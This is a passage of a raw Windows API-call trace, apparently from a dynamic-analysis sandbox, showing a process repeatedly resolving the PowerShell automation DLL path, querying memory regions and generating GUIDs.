returned 0x74 [0078.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.821] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x48c051ff, Data2=0xbb99, Data3=0x49da, Data4=([0]=0xbe, [1]=0x33, [2]=0x82, [3]=0x83, [4]=0x60, [5]=0x0, [6]=0x3f, [7]=0xe4))) returned 0x0 [0078.821] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.822] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.822] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.822] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.822] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.823] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.823] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.824] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.824] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.825] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.825] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.825] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.825] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.826] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.826] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.826] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.827] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.827] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.827] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.827] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.827] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xfebe47ea, Data2=0xdd89, Data3=0x45c0, Data4=([0]=0x85, [1]=0xa7, [2]=0x45, [3]=0x82, [4]=0xfd, [5]=0xa0, [6]=0x68, [7]=0xdf))) returned 0x0 [0078.827] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.828] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.828] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.828] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.828] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.829] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.829] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.829] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.829] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.830] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.830] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.830] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.830] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.831] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.831] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.832] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.832] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.832] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.832] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.832] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.832] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xd6a929e, Data2=0x13ed, Data3=0x4c6f, Data4=([0]=0xa8, [1]=0xb, [2]=0x5d, [3]=0x63, [4]=0x51, [5]=0x60, [6]=0x6b, [7]=0xcf))) returned 0x0 [0078.833] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.833] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.833] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.834] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.834] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.834] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.834] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.834] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.834] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.835] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.835] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.835] VirtualQuery (in: lpAddress=0xcb400, lpBuffer=0xcc2c0, dwLength=0x30 | out: lpBuffer=0xcc2c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.835] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.836] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.836] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.836] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.836] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x5a1791c1, Data2=0x21c0, Data3=0x4cc1, Data4=([0]=0xbc, [1]=0x88, [2]=0x39, [3]=0xe7, [4]=0xf8, [5]=0x6e, [6]=0x56, [7]=0x7e))) returned 0x0 [0078.836] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x9699755e, Data2=0x280d, Data3=0x466e, Data4=([0]=0xad, [1]=0xf5, [2]=0xeb, [3]=0x16, [4]=0x1a, [5]=0x78, [6]=0x85, [7]=0xe5))) returned 0x0 [0078.837] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x6b90e7f, Data2=0x3f75, Data3=0x4cbb, Data4=([0]=0x81, [1]=0xb3, [2]=0x5f, [3]=0xa0, [4]=0xb4, [5]=0x3d, [6]=0x8a, [7]=0x2c))) returned 0x0 [0078.837] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x6af2e67a, Data2=0xed37, Data3=0x4cd9, Data4=([0]=0xbe, [1]=0x83, [2]=0x36, [3]=0x22, [4]=0x2a, [5]=0x2e, [6]=0x55, [7]=0x8e))) returned 0x0 [0078.838] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xc064036c, Data2=0x6ddf, Data3=0x450f, Data4=([0]=0xba, [1]=0xd5, [2]=0xd6, [3]=0xb, [4]=0x52, [5]=0x30, [6]=0x7b, [7]=0x89))) returned 0x0 [0078.838] VirtualQuery (in: lpAddress=0xcb510, lpBuffer=0xcc3d0, dwLength=0x30 | out: lpBuffer=0xcc3d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.838] VirtualQuery (in: lpAddress=0xcb5a0, lpBuffer=0xcc460, dwLength=0x30 | out: lpBuffer=0xcc460*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.838] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xec7dff0a, Data2=0x3e9f, Data3=0x4b0f, Data4=([0]=0x9e, [1]=0xaf, [2]=0xe7, [3]=0xb1, [4]=0xd8, [5]=0xf1, [6]=0x39, [7]=0x58))) returned 0x0 [0078.838] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x5e7cf9b5, Data2=0xcecf, Data3=0x4f37, Data4=([0]=0x94, [1]=0x79, [2]=0x3b, [3]=0xb0, [4]=0xf3, [5]=0x60, [6]=0xe9, [7]=0x30))) returned 0x0 [0078.839] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x49c9c51d, Data2=0xef21, Data3=0x4173, Data4=([0]=0xa4, [1]=0x22, [2]=0x78, [3]=0xd0, [4]=0xcd, [5]=0x3f, [6]=0xa0, 